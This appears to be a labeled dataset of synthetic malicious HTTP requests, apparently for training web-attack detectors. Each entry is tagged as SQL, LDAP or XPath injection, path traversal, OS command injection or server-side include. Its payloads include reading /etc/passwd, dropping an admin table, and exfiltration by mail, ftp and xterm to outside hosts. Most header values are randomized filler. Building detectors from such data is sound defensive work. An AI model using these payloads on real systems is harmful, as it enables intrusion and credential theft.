~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eehhtchpiut=cPbGhM91-l&igelualai0h=0hutmi$netcat&texc'?eN&nttliloonPsyt=7408941&nncrpooert9=eht'/**/UNION/**/SELECT/**/pyoumy/**/FROM/**/dba_users/**/WHERE/**/aIe0ro/**/like/**/'%25&3ljC=eDnOP&amyes3eoghn9r=143416

End - Id: 41497
Start - Id: 36286
class: PathTransversal
GET /idzW9DFVYgu/lyBh.sh?xoogcGrrngiwel=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fs4pOre.conf HTTP/1.1
Host: 80.74.134.36
Connection: n9n3aeAE
Accept: application/x-tar;q=0.2, application/x-tar, audio/*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Abaxjee-n, sauil-d, 5rierhN-ln5t, ozsctiey-si
Cache-Control: max-stale
Client-ip: 114.100.144.6
Cookie: 8iitiR1=t=%sek]zIcbgsoundtU>a sock_streamr
Cookie2: $Version="483"
Date: Sun, 30 Aug 09 08:48:18 GMT
ETag: W/"tkoJK.8fzDRFrof_-"
Expect: 100-continue
From: 7sEpze@hrhiarN7.de
If-Modified-Since: Wed, 27 Aug 08 04:00:10 GMT
If-Unmodified-Since: Sat, 05 Nov 05 20:02:08 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 07 Sep 05 20:35:33 CET
Max-Forwards: 0
MIME-Version: 5.5
Pragma: zle='lljur'
Proxy-Authorization: NTLM aXVmc2llbjJSZ2VvSGVlc2wwdW90N2FvYWV6ZXRyYWg=
Authorization: Digest uri=/ohyil/aroargkr/gi5s/ifatlbm/wsnitgp.asp
Range: 59661-,9-,-7
Referer: /oraena/rE0aar1i/alaeenid/hadlhdus/eeoftdry.cgi
TE: trailers
Trailer: Accept-Encoding
User-Agent: snxJ3830i http://www.sthni.net
UA-CPU: StrongARM
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1458x3720
Via: HTTP/6.7 www.eersm.tiff
Transfer-Encoding: compress
Upgrade: ye1nNS/5.5
Warning: 577 www.vkgsei.gif "nyhteteay" "Wed, 04 Jun 08 24:04:38 UTC"
X-Serial-Number: 3858869813582017
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36286
Start - Id: 42186
class: SqlInjection
GET /avnHwJ/itgen8eJsn4/mArgreewsoriGCbl6phj/GKQ-6DCAQ4ggmJ5/rFZ88B.Z@8D2tS7_jD/erJUfb..html?m2esbwhyu=2&8tmagwtiehn=taszYwi&uhcmmpnLoo=%5DNn&em=xtdgc&fhet=aoaaccess_logedhetoor&to6s=%27%3B++drop++++table+++++admin&qR9XlfB3=tdhdl%2FerWefl&n398mrmiSu=ee5JO_NPjn&eiiiripdeb=gi-uRat%3E%5Bob&hoteith=74053990&NMHTkiUJbq=dopenmneIf&2zc=mochaaaMuuinputgteNn%3Dao HTTP/1.1
Host: 208.27.91.193
Connection: keep-alive
Accept: audio/basic
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: et-65jsine;q=0.5, itsl-e;q=0.0, p4aetabs-tu3;q=0.6, lrIu-d;q=0.2, u4Itnzis-TjnpReio;q=0.7
Cache-Control: min-fresh=080
Client-ip: 171.126.113.10
Cookie: 2_JW=070802157;isemen=o8;;y0eta4=646877805
Cookie2: $Version="70"
Date: Wed, 17 May 06 17:02:11 UTC
ETag: "HD6DB7u@yQJJkbe"
Expect: irpp0=cI1o9hea;esvtet
From: tnetRvi@fedacee.com
If-Modified-Since: Sat, 01 Jan 05 22:48:47 UTC
If-Unmodified-Since: Wed, 25 Jul 07 11:17:52 GMT
If-Match: *
If-None-Match: "Q.JY1@y803FlTFyiHki"
If-Range: Fri, 08 Jan 10 09:31:19 UTC
Max-Forwards: 98
MIME-Version: 5.3
Pragma: aaP1='8trhO'
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: tttnT asArsom=lnlse
Range: 1010-
Referer: /ette/rbzaotS/So2cshd.tar.gz
TE: gzip,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.7 (Windows; U; Windows NT 3.9; tS-hf; rv:7.0.8) Gecko/77290246
UA-CPU: StrongARM
UA-Disp: 466,6159,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 124x5537
Via: wh3i86/8.6 84.214.31.249, 6.6 152.243.157.211
Transfer-Encoding: compress
Upgrade: ji40ad/7.5, ednwes/8.3, osi/1.7, eor/7.9
Warning: 601 194.137.96.43 "gotieoa7eticdpyar6l2" "Thu, 01 Mar 07 08:53:20 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 41681316983855974
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42186
Start - Id: 45894
class: PathTransversal
GET /dhjtoaeofe/ed/n8a@5GI1WOHXEE.YaPYZ/eena.msf?xXXD=rmnwxaexg&millctse4s9lL=93105&55nR9=386&aeawzuab=ye8&tInb_7=106&nea=fromvjRddocumentoiici0afnhoexech%5D&evD=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat&imUte=8 HTTP/1.1
Host: 30.47.32.9:4
Connection: tnssat
Accept: application/*;q=0.1, video/mpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 191.79.240.211
Cookie: 7aItitahs=tCeLecnx2wiieiymEc;7otrtestusdn=4>t;dslgnlAyxsvy=67
Cookie2: $Version="33"
Date: Sat, 01 Jul 06 14:03:17 UTC
ETag: W/"HxqwZITyDf0T7olEZiF"
Expect: 100-continue
From: erymey@jq6fn.org
If-Modified-Since: Wed, 04 Feb 09 12:20:28 UTC
If-Unmodified-Since: Thu, 18 Jun 09 17:18:34 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 03 May 05 23:11:10 CET
Max-Forwards: 18
MIME-Version: 5.1
Pragma: vfOyrte='alwkded'
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: Digest uri=http://rwr7.cz/p4hn/tem4/aybte3e/orupse.dll
Range: 58-182597,4-9
Referer: /asr7.dll
TE: trailers
Trailer: TE
User-Agent: Mozilla/0.6 (Machintosh; U; Mac OS X 8.4; bs-sU; rv:6.8.3) Gecko/82701146
UA-CPU: StrongARM
UA-Disp: 567,3273,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1031x814
Via: ooieti/9.3 88.252.154.57
Transfer-Encoding: compress
Upgrade: iedr/6.7, enx/4.7
Warning: 813 www.vtuj27.png "rsxiUrrhinfa" "Sun, 10 Aug 08 15:25:17 UTC"
X-Forwarded-For: 121.121.166.30
X-Serial-Number: 42462997439342204016
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45894
Start - Id: 38411
class: LdapInjection
GET /ecMx.6C/tQodzewoI/bFRvdf.TkQ5c/nYIitItieessii/tJf/7tfsemlmhzhjlja0tms/6rcallX/sQniJCYt8.lBE1/nsmeii/wotpuifjdgr.nsf?dlosrohkm=%29++%28+++%7C+++%28+cn%3D*o+++%27brien*++%29%28mail++++%3D*o+%27brien*+%29++++&ieusvArmytot=uc%40&KmpasswdVOZ=ml53&drAwiaes4s=64&ni=tapasswdu%2Fl%2Bhn HTTP/1.0
Host: www.0odni.net
Connection: close
Accept: image/*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 134.194.27.49
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="8"
Date: Mon, 08 Aug 05 16:28:45 CET
ETag: W/".EYU.n7Y9CWr.S7TAVW"
Expect: c2dEa
From: enednoPu@Nyseo.uk
If-Modified-Since: Sun, 01 Feb 09 16:32:11 UTC
If-Unmodified-Since: Sat, 12 Mar 05 03:51:09 UTC
If-Match: *
If-None-Match: ".L_JaC87n1VuK80YnxRg"
If-Range: "-TG6qbEQt@McZzkKl@IQ"
Max-Forwards: 0
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: h80n hmasNo=a0xee
Authorization: NTLM Ym9oZmg1dDJ0bmV1YWxlaWp5MW4wc3R0ZWQyZGVhaGdyeXVldA==
Range: -96373
Referer: /ektaja/36ee/1rOmAE/oeuh/moiO9ek.msf
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/9.5 (compatible; Konqueror/0.4; Linux i386; nreriqiaim; pouwvo2; 2Seabgc)
UA-CPU: MIPS
UA-Disp: 2631,041,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 7262x7113
Via: DiTIrh/7.1 www.heuideh.gif:11510, HTTP/1.4 www.sieiptN.png
Transfer-Encoding: gzip
Upgrade: Elgm/6.3, hea/6.4, She/5.1, dol/2.2
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 8565701730547644653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38411
Start - Id: 43324
class: OsCommanding
GET /netibsesapsragktvtE/dmOd3J/alCZ67aT/7aptAsxeX5aepcrCSnR/knwtileeiiqx/drasnsytalaryis7mf/tpa2nis.cfm?hointHlsn=393822&ZlBYFRG=4745&e7ept0tli=sLT7S&ebaenres1ne7fi=18968263&2qtai9alao4=1OD16&jseyt3is=cit%25a&es=45206&HNOxjWFstdinI=3rnr%7Cpaa%5Cg0aperla&od=9298&wylpaARfknee=rgm&oMami=oops+++++%3B++cat+++%2Fetc%2Fpasswd++%7Cmail+++++your%40alN.com&thoo=sInPBB&yuKy=rH_3ZEvYhc HTTP/1.0
Host: www.apR5Ocith.fr:80
Connection: close
Accept: video/*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: nu4w2-ogqZ;q=0.7, iA2wne-Syg, 1EW-eeit4W;q=0.3, ewAPm-aburdIi, sah-eo6h
Cache-Control: Obe=Cr4
Client-ip: 86.69.183.54
Cookie: tam8paOmeIda=ai60zE;ezracUa=e90me;rtmp7PPSgB=nWatNmlaial;nxeqnH1i=istHsdivR;toljiao207pa=1008815205
Cookie2: $Version="3"
Date: Thu, 09 Jun 05 03:38:09 UTC
ETag: "L6Op1aeDmT9K1KLGR"
Expect: 100-continue
From: eTnr@war0.be
If-Modified-Since: Thu, 08 Jan 09 08:45:51 GMT
If-Unmodified-Since: Tue, 02 Dec 08 22:59:24 GMT
If-Match: "9FiNUJHOkAQ-9fga_ld"
If-None-Match: "D4fZ-V7Uwe-IdHIm"
If-Range: Thu, 29 Apr 10 20:00:33 GMT
Max-Forwards: 0181
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM aXlCUG5Zbm5ybXJ0aUZ6dG85SXdlaGVmZ2ZkaXVhZ2Rkdnlpb25saGJL
Authorization: eDloa hhEAnpe=aemiftda
Range: 2030-1
Referer: http://www.eoElrrr.cz/eeam9/ideoaIio/nls6ssJ/eosfgin.gz
TE: trailers,trailers,gzip
Trailer: Expect
User-Agent: Mozilla/7.4 (Windows; U; WinNT 5.2; h9-e6; rv:3.0.0) Gecko/62286550
UA-CPU: 68000
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: N7sh/4.1 24.211.19.116, FTP/9.6 www.pshucd.jpg
Transfer-Encoding: identity
Upgrade: s6hdl/7.5, 6rdns/6.0, wt2/7.2, trtfwt/0.2, z5mi/7.4
Warning: 213 www.e6ttha.html:3574 "evi1u0aas9lO3ep" 
X-Forwarded-For: 213.135.117.46
X-Serial-Number: 356926769417178111
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43324
Start - Id: 39920
class: SSI
PUT /svl-C/deregnnildxt/1BQ/lS82Xld9TvrslKqat0/hrt8conremrwy/n7pinsdiaa.jpg? HTTP/1.1
Content-Length: 189
Content-Language: iht4t2gn,eueipI
Content-Encoding: compress
Content-Location: /yecfc/2eozcrn2/ohibzrl/iedudocS.wmn
Content-MD5: eVRhdHQyZGVxbG5mbzllaA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 Apr 04 22:53:45 CET
Last-Modified: Thu, 23 Jul 09 19:55:20 UTC
Host: www.ytem.biz
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: max-stale
Client-ip: 239.36.31.16
Cookie: al=4
Cookie2: $Version="724"
Date: Tue, 02 Sep 08 09:42:22 UTC
ETag: "oFCCtwKdqig7svS9H"
Expect: 100-continue
From: 7v1w1el@eidae.cz
If-Modified-Since: Sun, 16 Jan 05 15:41:18 CET
If-Unmodified-Since: Thu, 09 Jul 09 03:29:13 UTC
If-Match: *
If-None-Match: "S8jwtcrJR3cTv9_"
If-Range: "10khbgQprWoU-9QDKDXF"
Max-Forwards: 88
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest response="dD0B7d539F14ACC6a145A7c016DF9930"
Authorization: Basic ZGhBaGFpYW46RXVzb0FvZmc=
Referer: /lcpo.exe
TE: trailers,gzip;q=0.4,trailers
Trailer: Trailer
User-Agent: amlovt (rF5_hLj4h)
UA-CPU: StrongARM
UA-Disp: 079,5438,8
UA-OS: FreeBSD
UA-Color: color16
Via: FTP/6.8 www.eeh8m.gif, FTP/7.8 119.27.175.250:62
Transfer-Encoding: identity
Upgrade: enw/1.2
Warning: 151 www.ttt8oAn.jpg "coIndbni" 
X-Forwarded-For: 54.46.237.13
X-Serial-Number: 2450299915461461
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

8lTU=mnmGrvK&arnhzeW8rbs=omoem&pAPAWsock_stream70.@O5=<!--  #exec   cmd="/bin/mail  unafot6q.com     <     /etc/passwd"-->&o4eaSkhfi=53930&n4oe=192&G2YacceptndmC=144

End - Id: 39920
Start - Id: 38297
class: LdapInjection
GET /a0s/tdYN_OyIgAWCgPf@F/HU0ioThdirsr/6ZcopyAlSSVG/2T.SVy12jCUrr9c-v7L/FKS2/tv0MEUuW0c8yVWSNgkob/nfDZJEq_KkzxLRyV/waccept..js?eh1oeBVhoue=osoc&a0asnairt=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&eeehmeieits=0357100&eakdtdt7ttsm=sDr2r8&4raruhehatAahl=nMYwOiRl HTTP/1.1
Host: 166.38.110.179:80
Connection: close
Accept: */*
Accept-Charset: windows-1254, x-mac-korean;q=0.8, windows-1250;q=0.8, windows-1252;q=0.0, isiri-3342
Accept-Encoding: identity;q=0.4, deflate;q=0.6, deflate;q=0.6, gzip;q=0.5, compress;q=0.9
Accept-Language: mat-1hulHo;q=0.1, feanZp-tpeurce, tyhjo-er
Cache-Control: no-transform
Client-ip: 146.107.64.207
Cookie: juys2=fielRns7nEla;K_Z2=hfeat;gmwpenlsh9=jhhtpass>n%;9a04ebilin5p=73529101;odld=3mmuMqY5@
Cookie2: $Version="91"
Date: Tue, 04 Jan 05 12:53:11 GMT
ETag: W/"Lprl45Lkv@EUGsrzim"
Expect: tNAnh
From: deosTn4@ntarwtzGa.ch
If-Modified-Since: Thu, 15 Apr 10 22:22:23 GMT
If-Unmodified-Since: Thu, 18 Jan 07 21:24:24 GMT
If-Match: "cA3hYR6DeOuMMRIhctj"
If-None-Match: "6728Pz6ebxoDwB4q"
If-Range: *
Max-Forwards: 2782
MIME-Version: 3.2
Pragma: iwraoo='ou0ai'
Proxy-Authorization: Digest username="xipatefi"
Authorization: Basic bWxnSDA6dHRlZWVlaWg=
Range: 6717-,60-,18458-657
Referer: http://www.j3tenrl.gov/qp0pO2n/otn3wRn/socryi.jpeg
TE: trailers,trailers
Trailer: From
User-Agent: todvieVja
UA-CPU: MIPS
UA-Disp: 059,0810,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 205x286
Via: FTP/4.9 219.207.6.110
Transfer-Encoding: gzip
Upgrade: segoo/3.8
Warning: 579 www.htehr.shtml:7460 "fyeYeyiN4nSSEx4" 
X-Forwarded-For: 36.212.4.168
X-Serial-Number: 055236562928
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38297
Start - Id: 38893
class: LdapInjection
GET /oU0Hyzd9qS2/aOwksxTGuzpq8CZH/wgetDeF2@eX/cvPv1ZN/RldrophscriptpositionfjoFYMjxh/lro/tjoothcn/Tosaoevi96eEarmr1/oneoe/tJEk/S7ua.css?3pgroup byJoQu=%29+++%28++++%7C+%28+cn%3D*o+%27brien*++%29%28mail++%3D*o++++%27brien*+++%29&GI46PIE8=tw6bbdYRr7&b6=4211012&yravoi=0rshrrzq1tsortttIi&6ss0rnrieo=zz95QABW HTTP/1.1
Host: 17.212.34.78
Connection: close
Accept: */*;q=0.5
Accept-Charset: x-mac-hebrew, utf-8
Accept-Encoding: compress
Accept-Language: *;q=0.3
Cache-Control: min-fresh=3503
Client-ip: 191.208.34.138
Cookie: uit=83820786;Rdeoewaf=nAuime
Cookie2: $Version="383"
Date: Wed, 25 Oct 06 08:13:07 UTC
ETag: "R0O7NP@sgmUcpkY8"
Expect: isoZd9h5=s7ntbi0r
From: w08rh3@rpehekeyi.com
If-Modified-Since: Wed, 19 Nov 08 04:45:55 GMT
If-Unmodified-Since: Sat, 09 Oct 04 11:06:22 GMT
If-Match: *
If-None-Match: "ryVf8n9p4suiwzd5G"
If-Range: Sat, 19 Apr 08 11:56:07 GMT
Max-Forwards: 2441
MIME-Version: 0.3
Pragma: yicbeptm='wt'
Proxy-Authorization: Digest username="woEv"
Authorization: NTLM aHA0VEh0RWkzTzZkcGhkc2VldHd5aWhlbmFlbW5lZWh0aXRlOHRpdG91b2J0bg==
Range: 15934-,799-8058,-81465
Referer: http://www.iuey.be/Tomtd.txt
TE: deflate,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.8 (Windows; U; Win 9x 4.2; ne-rw; rv:4.5.4) Gecko/53388357
UA-CPU: x86
UA-Disp: 117,0811,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 297x7324
Via: 3.7 212.12.149.213, bnne/4.9 www.rrth.shtml, 0.9 www.yItriu.js
Transfer-Encoding: etors; akatC=LOyruhn6
Upgrade: v4ALI/5.0, wpsz/7.3
Warning: 822 www.hOrItr7c.jpg:50734 "1jmea2e2uepaea" "Mon, 20 Jun 05 14:05:30 GMT"
X-Forwarded-For: 179.200.182.228
X-Serial-Number: 9521103915785136495
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38893
Start - Id: 49358
class: XPathInjection
GET /oD/t1Us.css?lH=filb%27+++or+++++1%3C+t%2Fju%2Fn%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D60%5D++or+++++%27sne%27%3D++%27&eehfadoeIsra=tinserttnull&eiEf=adonH&cysbjhsZi=psru%3AtmpaE HTTP/1.1
Host: www.VnwElhlo.biz:80
Connection: egoia5
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 186.93.100.231
Cookie: gDsomtaf=Yti;H8l9pl3nehe=~nhrnm+boaio;wrceosw=17185
Cookie2: $Version="189"
Date: Sat, 21 Jul 07 08:38:33 CET
ETag: W/"e7ALYWdkwT_kw1lOFgF"
Expect: 100-continue
From: EgerC@tafwi.com
If-Modified-Since: Wed, 12 Aug 09 02:28:53 CET
If-Unmodified-Since: Tue, 22 May 07 22:37:34 GMT
If-Match: *
If-None-Match: "fVDI5P1-cC7e9XqZ0F_"
If-Range: *
Max-Forwards: 87
MIME-Version: 2.9
Pragma: eeemst0e=gz
Proxy-Authorization: NTLM ZmhhZXVpb2JhNGljb2F6cVdvbnNvaWhPbEhyRWV0YXRiZWVmQWxy
Authorization: Digest opaque="Eoluor"
Range: 896-
Referer: /onqN.tar.gz
TE: trailers
Trailer: Proxy-Authorization
User-Agent: sbrgeq6tsk (mCa8u8h5tz; e_hOafUG; 2fluT3; gArpvepw; nSXyod9dt)
UA-CPU: StrongARM
UA-Disp: 646,996,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 953x2070
Via: dgbso/6.1 159.184.122.174, 2.4 www.sheaEo.jpg
Transfer-Encoding: 7eenc; eiyE8Shp=d7hen
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 652 www.nylcr.tiff "iphresmanuhdbtxo" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49358
Start - Id: 43498
class: OsCommanding
GET /bXNITs--5HdropPM0H/sAm_FT9kQfq5DPZpF/ezqytsaI1HFsn/ptdhivtec/Ra/ieteeuiae4EoaSpcasro/sVCtjUA6TfrGKDVCx3/ulnrothsAowEnOu/eivjBrn/ntmg.mdb?stypT1utidjNo3L=hlel%3E&TYFB8W=%5Crxterm+++++-display+207.208.120.62%3A0.0&lynt=%3Acatzposition&ePl4=itwj3u&tmi38Tisa=720&yueai8deni=n%2Fforml&ErOoS=x%27ADlinkv&lR=cOoi&i2o1no=360767142&Vyxc8ks=Ti69thE HTTP/1.1
Host: www.5n4aow0uP.org
Connection: lt7ei
Accept: */*;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: compress, compress
Accept-Language: ui5rea-X;q=0.5
Cache-Control: teggipz='n'
Client-ip: 165.212.182.35
Cookie: Pp8noHi7nayle5=9095;0Adot=opun4Meen;tDideuHgL=ttrsmxx43aodmt;5O1uaot=$
Cookie2: $Version="514"
Date: Sat, 03 Apr 10 14:29:19 CET
ETag: W/"uhZCKDWcmyXWFNL"
Expect: reNwssAo=Iiubo;seruenh=eiwamf
From: ng6Ncd@ciehr.com
If-Modified-Since: Wed, 14 Jan 09 08:42:47 CET
If-Unmodified-Since: Fri, 12 Jun 09 08:20:36 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1573
MIME-Version: 3.4
Pragma: lgnnp='fe'
Proxy-Authorization: NTLM b2NpT2hvcW1vN2ljcXB0Z25oZXNzbUVvN2Vpc2FFcmRBc2RuaFQ=
Authorization: Basic YXVoaHExZTpub3RybzBldA==
Range: 32-61,4386-85
Referer: http://www.ieinvno.it/jra6sSn/ectohuak/bnFS/Rnons3.conf
TE: trailers
Trailer: Referer
User-Agent: Mozilla/8.0 (X11; U; Open BSD i586 6.4; WA-eI; rv:1.8.8) Gecko/71858118
UA-CPU: MIPS
UA-Disp: 777,376,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2941x889
Via: 5.8 33.148.210.176
Transfer-Encoding: deflate
Upgrade: trzhel/9.1, tsfae/2.2
Warning: 030 157.207.32.92 "imad6oletnEdRcinytly" "Thu, 14 Apr 05 13:21:07 CET"
X-Forwarded-For: 137.226.116.122
X-Serial-Number: 521013041943
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43498
Start - Id: 39241
class: SSI
GET /dm035/aucoxs/tss4ebfncu2ia/hgGNN/e-HD9BaG1n_D/linkde5mHNt/d2zI/orcddroil/tU7x2RGI72Npg/mrvirsee.asmx?1Atxl4odr2t=ea&D9f9M=mrakscriptbWs%3BuTe0%5Dh&eaieyMohf6Ktdtu=wEcfdteoc&e1aain=4u3ec3yerhfmfgtnhg&lefiitmyt=0658&oDpsGQ=l50iNEp&uciegeRti=%3FndadeneoRs&ta28z=%3C%21--%23email+fromhost%3D%22www.bioSdt.com%22+tohost%3D%22mailbox.7byi.com%22+message%3D%22dnls+iaoiewc+mohSwr+br1%22+fromaddress%3D%22eero.com%22+toaddress%3D%22eue.te.com%22+subject%3D%22h%22+sender%3D%22usd.com%22+replyto%3D%22ih3dftm.com%22+cc%3D%22lt%22+inreplyto%3D%22ww+xsa+n%22+id%3D%223smail%22+--%3E HTTP/1.1
Host: www.bwicis.de
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-korean;q=0.7, iso-8859-7
Accept-Encoding: identity, compress, deflate
Accept-Language: ddrFdct3-o, erotni-H;q=0.0, n8d-zaso, H-iagsA, r-bioL;q=0.1
Cache-Control: no-store
Client-ip: 240.199.60.134
Cookie: auebhRA4mink=616884075;nezeiontcr0noi=2329257640
Cookie2: $Version="2"
Date: Fri, 07 Jul 06 13:29:55 CET
ETag: W/"jRsIL1CqmGtIEhLf-xD7"
Expect: 100-continue
From: ogpe@eKhmc.uk
If-Modified-Since: Sun, 06 Sep 09 23:29:26 CET
If-Unmodified-Since: Mon, 12 Jun 06 09:09:42 CET
If-Match: "Ax_Hwmw7aTiwjzh"
If-None-Match: "N.cmXCUp8aUw.1p8dC"
If-Range: "QEelm2mgLh-UbRfP0"
Max-Forwards: 86
MIME-Version: 4.9
Pragma: l4ocdme=ftotto3
Proxy-Authorization: Basic c2ltMjpzYWdlYjVhYQ==
Authorization: Digest realm
Range: 5-9725,-6683
Referer: http://instfm.de/euA5lrh/hutsl/tnBg/aqng.wav
TE: trailers,trailers
Trailer: Range
User-Agent: sQtx7/3.0.2.6
UA-CPU: PowerPC
UA-Disp: 274,6270,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 833x510
Via: 7.3 www.juAstie.shtml, HTTP/7.6 www.ednc.gif
Transfer-Encoding: deflate
Upgrade: sjrtoN/2.4, ytwq/5.4, RmLke/9.3, citRri/1.2
Warning: 181 99.114.125.39:5648 "7neetnanYrOl" "Tue, 11 Jul 06 10:45:12 GMT"
X-Forwarded-For: 252.9.253.184
X-Serial-Number: 2940498240401251
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39241
Start - Id: 43588
class: OsCommanding
GET /e-3qEcKDC/etonrgcmr8IfderXnT6d/NawoOleaNest/lntga8zu/rFWo-46wkW/ureptouOm6nu/passthrug3VbrjdcT@/wPX6-qp9EpkCl9q4/nylwjmeve4/ZRUnmsM0/it2aneapd.bin?bno6dKtiRsnu=wLav&dcdnfxssl=aor9%40th&tn0imaae=%27+++%3Buftp++-g+++%2Fhome%2Fisnasierteet%2Fmeormeesst++++96.118.135.77++++%2Fanna%3B HTTP/1.0
Host: www.dtshp.be
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: identity;q=0.6
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 170.185.16.223
Cookie: HP6@xkZ=4754;UhiGC=bhpea utxy;SacsD7aaeumLiy5=nQV.gBZ;ed9gneyidsn=15525
Cookie2: $Version="9"
Date: Sat, 09 May 09 18:40:27 CET
ETag: "z@VDwv-LBAonIc6"
Expect: gtmnl0e=x4oheja
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Mon, 03 May 04 14:43:40 UTC
If-Unmodified-Since: Mon, 26 Nov 07 23:49:47 UTC
If-Match: "piIuvh_cu@QBmPIO"
If-None-Match: "PrDDuqcxo03A.BA0"
If-Range: "Kdd16RWG6ofbBQIF"
Max-Forwards: 0799
MIME-Version: 2.6
Pragma: o='arb'
Proxy-Authorization: Digest response="8a53FcC7Ddbc193e48E8D78D14E7FaAD"
Authorization: Digest username="6yeim"
Range: 0756-,6170-,99043-471
Referer: http://onnhrr7t.it/7dturdoy.htm
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: l4jotha
UA-CPU: PowerPC
UA-Disp: 084,5683,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 881x134
Via: FTP/9.9 www.ttNMy.png:8809
Transfer-Encoding: compress
X-Forwarded-For: 249.181.31.217
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43588
Start - Id: 39289
class: SSI
GET /z8mailsam7f-/xtnAebnc/Ee58u/0xd.php?ma=s7%40GW_wZ6EL&k1dak1i=376855&hsohm8nen8hspnr=sU5Dmjt&B.prtvwenxtermU=Ea%27eyand+t&oeeseesyzeveaot=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&5fdotr=5&aentsameo=47813784&t5enoaaxie4=wp-&eoeoeett8dtef=horb&tl9cxasrh=rwinnttee&rp7mr6tomrtK=e%40&on=en5si HTTP/1.0
Host: 162.8.247.108
Connection: close
Accept: application/postscript
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ps6dia62-o, oW7-egLo, her-dtaiuh
Cache-Control: max-age=84
Client-ip: 178.60.27.113
Cookie: emlinsaeodats=829177;adminDkC=tbCGL31Y6KEz
Cookie2: $Version="390"
Date: Sun, 27 Sep 09 07:17:45 CET
ETag: W/"9ib8ik4X3d-J0zUTbY"
Expect: pra5=4Ete
From: tdoqaue@tuogttti.uk
If-Modified-Since: Thu, 08 Nov 07 11:22:44 CET
If-Unmodified-Since: Wed, 18 Jul 07 01:29:17 GMT
If-Match: "HXJ5YO2A6Fz09._Jq"
If-None-Match: "LN@eV.Sh6iyn1tJ_31l"
If-Range: Tue, 14 Aug 07 19:11:14 UTC
Max-Forwards: 38
MIME-Version: 8.4
Pragma: ieyern=w
Proxy-Authorization: Basic aUFxb293YjpvaWFtaHBz
Authorization: Digest nc=e472deD1
Range: 419016-,344-
Referer: http://mtece.gov/aakoo/iezr.gif
TE: trailers,trailers
Trailer: Host
User-Agent: esS1etsE/4.5
UA-CPU: Sparc
UA-Disp: 646,7509,32
